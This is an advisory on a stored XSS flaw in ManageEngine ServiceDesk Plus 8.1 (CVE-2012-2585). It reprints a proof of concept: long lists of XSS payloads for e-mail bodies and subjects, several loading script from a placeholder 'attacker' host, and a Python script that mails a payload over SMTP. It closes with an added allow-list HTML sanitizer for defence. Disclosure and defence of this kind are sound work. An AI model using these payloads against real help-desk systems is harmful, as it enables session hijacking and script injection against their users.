ManageEngine ServiceDesk Plus E-mail Body Script Insertion Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
ManageEngine ServiceDesk Plus 8.x
Description:
--------------------------------------------------------------------------------
Cve id: CVE-2012-2585

ManageEngine ServiceDesk Plus is customizable help desk software.

ManageEngine ServiceDesk Plus 8.1 and other versions do not properly filter the body of e-mails that are converted into requests. Arbitrary HTML and script code can be inserted into a request this way, and it is executed in the browser session of any user who views the request, in the context of the affected site.

Source: loneferret

Links:
http://secunia.com/advisories/50198/
http://www.exploit-db.com/exploits/20356/

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Use at your own risk!

loneferret provides the following test method:


#!/usr/bin/python
# Python 2 proof of concept as published on exploit-db (20356). The docstring is
# raw so that the backslashes in the payload list do not break compilation.

r'''
Author: loneferret of Offensive Security
Product: ManageEngine Service Desk Plus (Windows standard)
Version: 8.1
Vendor Site: http://www.manageengine.com
Software Download: http://www.manageengine.com/products/service-desk/download.html

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
27 Jul 2012: Vendor requested additional information
30 Jul 2012: Additional proofs of concept provided to vendor
03 Aug 2012: Vendor acknowledged receipt of PoC and declares intent to fix
08 Aug 2012: Public Disclosure

Installed On: Windows Server 2003 SP2
Client Test OS: Windows 7 Pro SP1 (x86)
Browser Used: Internet Explorer 9


Injection Point: Body
Injection Payload(s):
1: ';alert(String.fromCharCode(88,83,83)//\';alert(String.fromCharCode(88,83,83)//";alert(String.fromCharCode(88,83,83)//\";alert(String.fromCharCode(88,83,83)//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83)</SCRIPT>=&{}
2: <SCRIPT>alert('xsss')</SCRIPT>
3: <script src=http://attacker/xss.js></SCRIPT>
4: <iframe src="javascript:alert('xss');"></IFRAME>
5: exp/*<xss style='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/expression(alert("XSS")'>
6:
7: <xss style="xss:expression(alert('xsss')">
8: <script src="http://attacker/xss.jpg"></SCRIPT>
9: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
10: <SCRIPT/xss src="http://attacker/xss.js"></SCRIPT>
11: <script src=//attacker/.j>
12: <SCRIPT>alert("XSS");//</SCRIPT>
13: <SCRIPT>alert("XSS")</SCRIPT>">
14: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
15: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
16: <SCRIPT a="blah" ''src="http://attacker/xss.js"></SCRIPT>
17: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
18: <SCRIPT a='>'src="http://attacker/xss.js"></SCRIPT>
19: <SCRIPT>document.write("<SCRI");</SCRIPT>pt src="http://attacker/xss.js"></SCRIPT>
20: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>

Injection Point: Subject
Injection Payload(s):
1: <SCRIPT>alert('xsss')</SCRIPT>
2: <script src=http://attacker/xss.js></SCRIPT>
3: <SCRIPT>alert(String.fromCharCode(88,83,83)</SCRIPT>
4: <div style="width:expression(alert('xsss');">
5: <iframe src="javascript:alert('xss');"></IFRAME>
6: <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
7: <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('xss');">
8:
9: <xss style="xss:expression(alert('xsss')">
10: <script src="http://attacker/xss.jpg"></SCRIPT>
11: </TITLE><SCRIPT>alert("XSS");</SCRIPT>
12: <SCRIPT/xss src="http://attacker/xss.js"></SCRIPT>
13: <script src=http://attacker/xss.js
14: <script src=//attacker/.j>
15: <iframe src=http://attacker/scriptlet.html <
16: <SCRIPT>alert("XSS");//</SCRIPT>
17: <SCRIPT>alert("XSS")</SCRIPT>">
18: <SCRIPT a=">" SRC="http://attacker/xss.js"></SCRIPT>
19: <SCRIPT ="blah" SRC="http://attacker/xss.js"></SCRIPT>
20: <SCRIPT a="blah" ''src="http://attacker/xss.js"></SCRIPT>
21: <SCRIPT "a='>'" SRC="http://attacker/xss.js"></SCRIPT>
22: <SCRIPT a='>'src="http://attacker/xss.js"></SCRIPT>
23: <SCRIPT>document.write("<SCRI");</SCRIPT>pt src="http://attacker/xss.js"></SCRIPT>
24: <SCRIPT a=">'>" SRC="http://attacker/xss.js"></SCRIPT>

'''

import smtplib, urllib2

# Payload placed in the Subject header (payload 11 of the subject list above).
payload = """</TITLE><SCRIPT>alert("XSS");</SCRIPT>"""

def sendMail(dstemail, frmemail, smtpsrv, username, password):
    # Raw RFC 822 message built by hand; the Subject header carries the payload.
    msg = "From: hacker@offsec.local\n"
    msg += "To: victim@victim.local\n"
    msg += 'Date: Today\r\n'
    msg += "Subject: XSS" + payload + "\n"
    msg += "Content-type: text/html\n"
    msg += "XSS.\r\n"
    server = smtplib.SMTP(smtpsrv)
    server.login(username, password)
    try:
        server.sendmail(frmemail, dstemail, msg)
    except Exception, e:
        print "[-] Failed to send email:"
        print "[*]" + str(e)
    server.quit()

# Test environment values from the author's lab.
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv = "172.16.84.171"

print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

ManageEngine
------------
At the time of writing, the vendor has not released a patch or upgrade for this issue. Users of the software are advised to watch the vendor's homepage for the latest version:

http://www.manageengine.com/products/opmanager/index.html
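Until a vendor fix is available, the defensive control on the application side is output and storage filtering of the fields the advisory names: the e-mail subject and body that become a request. The following is an added example, not code from the advisory, from loneferret, or from ManageEngine. It is an allow-list HTML sanitizer built on Python's standard library that keeps a few formatting tags in the body, removes executable elements together with their contents, strips every attribute except safe `href` values, treats the subject as plain text, and records every removal so the mail-ingest pipeline can raise an alert. All function names, the tag and attribute lists, and the sample mails in the `__main__` block are assumptions constructed for this example.

```python
# Added example, not part of the advisory or of the vendor's code: an allow-list
# HTML sanitizer for the mail-to-request path the advisory describes. Body HTML
# keeps a few formatting tags, everything else is escaped, executable elements
# are removed together with their contents, and each removal is recorded so the
# ingest pipeline can alert on it. The subject is treated as plain text.
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "strong", "em", "ul", "ol", "li", "blockquote", "a"}
VOID_TAGS = {"br"}
# Elements whose text content must disappear along with the tag itself.
DROP_WITH_CONTENT = {"script", "style", "iframe", "object", "embed", "title", "noscript"}
ALLOWED_ATTRS = {"a": {"href"}}          # no style, no on* handlers, nothing else
SAFE_SCHEMES = {"http", "https", "mailto"}


class _Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # sanitized fragments
        self.dropped = []      # (tag, reason) for every removal, for alerting
        self._open = []        # allowed tags still open, so output stays well-formed
        self._drop_depth = 0   # > 0 while inside an element whose content is discarded

    def handle_starttag(self, tag, attrs):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth += 1
            return
        if tag in DROP_WITH_CONTENT:
            self._drop_depth = 1
            self.dropped.append((tag, "active element removed with its content"))
            return
        if tag not in ALLOWED_TAGS:
            # <meta>, <xss style=...>, <div style=expression(...)>: tag goes, text stays
            self.dropped.append((tag, "disallowed tag"))
            return
        kept = []
        for name, value in attrs:
            if value is None or name not in ALLOWED_ATTRS.get(tag, set()):
                self.dropped.append((tag, "disallowed attribute %s" % name))
                continue
            if name == "href" and urlparse(value.strip()).scheme.lower() not in SAFE_SCHEMES:
                self.dropped.append((tag, "href with unsafe scheme"))
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID_TAGS:
            self._open.append(tag)

    def handle_endtag(self, tag):
        if self._drop_depth:
            if tag in DROP_WITH_CONTENT:
                self._drop_depth -= 1
            return
        if tag in self._open:
            while True:        # also close anything left open inside it
                open_tag = self._open.pop()
                self.out.append("</%s>" % open_tag)
                if open_tag == tag:
                    break

    def handle_data(self, data):
        # Text is re-escaped, so "<" and "&" never reach the page unencoded.
        if not self._drop_depth:
            self.out.append(html.escape(data, quote=False))

    def close(self):
        super().close()
        while self._open:      # close what the sender left open
            self.out.append("</%s>" % self._open.pop())

    # Comments, declarations and processing instructions fall through to
    # HTMLParser's no-op handlers, so they never reach the output.


def sanitize_html(fragment):
    """Return (sanitized fragment, list of removals)."""
    p = _Sanitizer()
    p.feed(fragment)
    p.close()
    return "".join(p.out), p.dropped


def sanitize_subject(subject):
    """A subject is plain text: collapse whitespace and escape it for HTML output."""
    return html.escape(" ".join(subject.split()), quote=True)


def request_from_mail(subject, body):
    """Build the request record to store; 'flagged' is the signal to alert on."""
    safe_body, dropped = sanitize_html(body)
    return {"subject": sanitize_subject(subject), "body": safe_body,
            "flagged": bool(dropped), "dropped": dropped}


if __name__ == "__main__":
    # Constructed inputs: one benign mail and two of the advisory's payloads.
    for subj, body in [("Printer broken", "<p>Hi, <b>printer 3</b> is down. Thanks &amp; bye</p>"),
                       ('</TITLE><SCRIPT>alert("XSS");</SCRIPT>', "XSS."),
                       ("help", '<iframe src="javascript:alert(\'xss\');"></IFRAME>')]:
        print(request_from_mail(subj, body))
```

The design point is the allow list: instead of trying to recognise each of the tag-splitting and attribute-quoting variants in the payload lists above, anything that is not explicitly permitted is escaped or removed, and the `dropped` list gives the SOC a per-request record of what was stripped from incoming mail.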
